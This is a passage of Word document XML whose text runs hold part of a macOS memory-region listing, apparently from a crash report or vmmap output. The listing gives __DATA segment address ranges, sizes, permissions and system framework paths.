    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b16000-00007fffd7b1f000 [   36K] rw-/rwx SM=COW  ...rameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b1f000-00007fffd7b25000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b25000-00007fffd7b26000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b26000-00007fffd7b27000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b27000-00007fffd7b28000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd7b28000-00007fffd7b29000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b29000-00007fffd7b2a000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b2a000-00007fffd7b2b000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b37000-00007fffd7b38000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7ba4000-00007fffd7ba6000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7bd6000-00007fffd7c00000 [  168K] rw-/rwx SM=COW  /System/Library/Frameworks/QTKit.framework/Versions/A/QTKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7c00000-00007fffd7c2f000 [  188K] rw-/rw- SM=COW  /System/Library/Frameworks/QTKit.framework/Versions/A/QTKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7c2f000-00007fffd7d59000 [ 1192K] rw-/rw- SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/ImageKit.framework/Versions/A/ImageKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7d59000-00007fffd7d85000 [  176K] rw-/rw- SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/PDFKit.framework/Versions/A/PDFKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7d85000-00007fffd7e00000 [  492K] rw-/rw- SM=COW  ...Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzComposer.framework/Versions/A/QuartzComposer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7e00000-00007fffd7e53000 [  332K] rw-/rwx SM=COW  ...Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzComposer.framework/Versions/A/QuartzComposer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd7e53000-00007fffd7e63000 [   64K] rw-/rwx SM=COW  ...m/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzFilters.framework/Versions/A/QuartzFilters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7e63000-00007fffd7eb0000 [  308K] rw-/rwx SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/QuickLookUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7eb0000-00007fffd7ee1000 [  196K] rw-/rwx SM=COW  /System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7ee1000-00007fffd7ef1000 [   64K] rw-/rwx SM=COW  /System/Library/Frameworks/QuickLook.framework/Versions/A/QuickLook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7ef1000-00007fffd7ef8000 [   28K] rw-/rwx SM=COW  /System/Library/Frameworks/SafariServices.framework/Versions/A/SafariServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7fa2000-00007fffd7fe2000 [  256K] rw-/rwx SM=COW  /System/Library/Frameworks/Security.framework/Versions/A/Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7fe2000-00007fffd7ff7000 [   84K] rw-/rwx SM=COW  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7ff7000-00007fffd8007000 [   64K] rw-/rwx SM=COW  /System/Library/Frameworks/SecurityInterface.framework/Versions/A/SecurityInterface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8007000-00007fffd8008000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8008000-00007fffd802a000 [  136K] rw-/rwx SM=COW  /System/Library/Frameworks/Social.framework/Versions/A/Social</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd80ad000-00007fffd80b8000 [   44K] rw-/rwx SM=COW  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd80b8000-00007fffd80e1000 [  164K] rw-/rwx SM=COW  /System/Library/Frameworks/VideoToolbox.framework/Versions/A/VideoToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd80e1000-00007fffd82ca000 [ 1956K] rw-/rwx SM=COW  /System/Library/Frameworks/WebKit.framework/Versions/A/Frameworks/WebCore.framework/Versions/A/WebCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd82ca000-00007fffd8301000 [  220K] rw-/rwx SM=COW  ...tem/Library/Frameworks/WebKit.framework/Versions/A/Frameworks/WebKitLegacy.framework/Versions/A/WebKitLegacy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8301000-00007fffd833e000 [  244K] rw-/rwx SM=COW  /System/Library/Frameworks/WebKit.framework/Versions/A/WebKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd83b5000-00007fffd83b6000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/APFS.framework/Versions/A/APFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8438000-00007fffd844e000 [   88K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AccountsDaemon.framework/Versions/A/AccountsDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd844e000-00007fffd845e000 [   64K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AccountsUI.framework/Versions/A/AccountsUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd84e3000-00007fffd84ea000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppContainer.framework/Versions/A/AppContainer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd84ea000-00007fffd84ed000 [   12K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppSandbox.framework/Versions/A/AppSandbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd84ed000-00007fffd84f2000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Apple80211</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__DATA                 00007fffd84f2000-00007fffd84f5000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/PrivateFrameworks/AppleFSCompression.framework/Versions/A/AppleFSCompression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8505000-00007fffd855a000 [  340K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd855e000-00007fffd8566000 [   32K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ApplePushService.framework/Versions/A/ApplePushService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8566000-00007fffd8567000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleSRP.framework/Versions/A/AppleSRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8567000-00007fffd8569000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleSystemInfo.framework/Versions/A/AppleSystemInfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8569000-00007fffd856b000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleVA.framework/Versions/A/AppleVA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd856f000-00007fffd8571000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AssetCacheServices.framework/Versions/A/AssetCacheServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd85db000-00007fffd85ed000 [   72K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Backup.framework/Versions/A/Backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd85f1000-00007fffd85f3000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Bom.framework/Versions/A/Bom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8672000-00007fffd867b000 [   36K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CacheDelete.framework/Versions/A/CacheDelete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd86b6000-00007fffd86ca000 [   80K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CalendarAgentLink.framework/Versions/A/CalendarAgentLink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd8852000-00007fffd8854000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8854000-00007fffd8871000 [  116K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd89d4000-00007fffd89d5000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8a06000-00007fffd8a2d000 [  156K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ContactsFoundation.framework/Versions/A/ContactsFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8a2d000-00007fffd8a3f000 [   72K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ContactsPersistence.framework/Versions/A/ContactsPersistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8a5b000-00007fffd8a5e000 [   12K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreAUC.framework/Versions/A/CoreAUC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8a5e000-00007fffd8a61000 [   12K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreAVCHD.framework/Versions/A/CoreAVCHD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8a8f000-00007fffd8a94000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreDaemon.framework/Versions/B/CoreDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8ae5000-00007fffd8aea000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreEmoji.framework/Versions/A/CoreEmoji</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8b01000-00007fffd8b05000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreMediaAuthoring.framework/Versions/A/CoreMediaAuthoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd8b06000-00007fffd8b29000 [  140K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CorePDF.framework/Versions/A/CorePDF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8b60000-00007fffd8b66000 [   24K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreServicesInternal.framework/Versions/A/CoreServicesInternal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8bf7000-00007fffd8bfc000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8bfc000-00007fffd8d42000 [ 1304K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreUI.framework/Versions/A/CoreUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8d42000-00007fffd8d56000 [   80K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreUtils.framework/Versions/A/CoreUtils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8d6d000-00007fffd8d8f000 [  136K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreWiFi.framework/Versions/A/CoreWiFi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8d8f000-00007fffd8d93000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8d9f000-00007fffd8dad000 [   56K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/DataDetectors.framework/Versions/A/DataDetectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8dad000-00007fffd8dc4000 [   92K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8dcf000-00007fffd8dd3000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__DATA                 00007fffd8dd3000-00007fffd8ddd000 [   40K] rw-/rwx SM=COW  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/DesktopServicesPriv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8ddf000-00007fffd8df5000 [   88K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8e06000-00007fffd8e08000 [    8K] rw-/rw- SM=COW  /System/Library/PrivateFrameworks/DisplayServices.framework/Versions/A/DisplayServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8e12000-00007fffd8e13000 [    4K] rw-/rw- SM=COW  /System/Library/PrivateFrameworks/EFILogin.framework/Versions/A/EFILogin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8ec6000-00007fffd9000000 [ 1256K] rw-/rw- SM=COW  /System/Library/PrivateFrameworks/FaceCore.framework/Versions/A/FaceCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9000000-00007fffd90cb000 [  812K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/FaceCore.framework/Versions/A/FaceCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd90e0000-00007fffd9181000 [  644K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/FinderKit.framework/Versions/A/FinderKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd928b000-00007fffd928c000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/GPUSupport.framework/Versions/A/Libraries/libGPUSupportMercury.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd930b000-00007fffd9312000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd931a000-00007fffd94b1000 [ 1628K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/GeoServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd94bc000-00007fffd94cc000 [   64K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd94cc000-00007fffd94d1000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/HelpData.framework/Versions/A/HelpData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd9621000-00007fffd9622000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9622000-00007fffd9623000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/IOPlatformPluginFamily.framework/Versions/A/IOPlatformPluginFamily</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9623000-00007fffd9626000 [   12K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/IOPresentment.framework/Versions/A/IOPresentment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9626000-00007fffd962f000 [   36K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/IconServices.framework/Versions/A/IconServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd965c000-00007fffd9661000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/IntlPreferences.framework/Versions/A/IntlPreferences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd966a000-00007fffd967e000 [   80K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9682000-00007fffd9689000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/LoggingSupport.framework/Versions/A/LoggingSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9689000-00007fffd968c000 [   12K] rw-/rwx SM=COW  ...ry/PrivateFrameworks/LoginUIKit.framework/Versions/A/Frameworks/LoginUICore.framework/Versions/A/LoginUICore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd96a8000-00007fffd96ed000 [  276K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MMCS.framework/Versions/A/MMCS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd97d1000-00007fffd97d2000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Mangrove.framework/Versions/A/Mangrove</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd9813000-00007fffd9818000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MediaKit.framework/Versions/A/MediaKit</w:t>
      </w:r>
    </w:p>
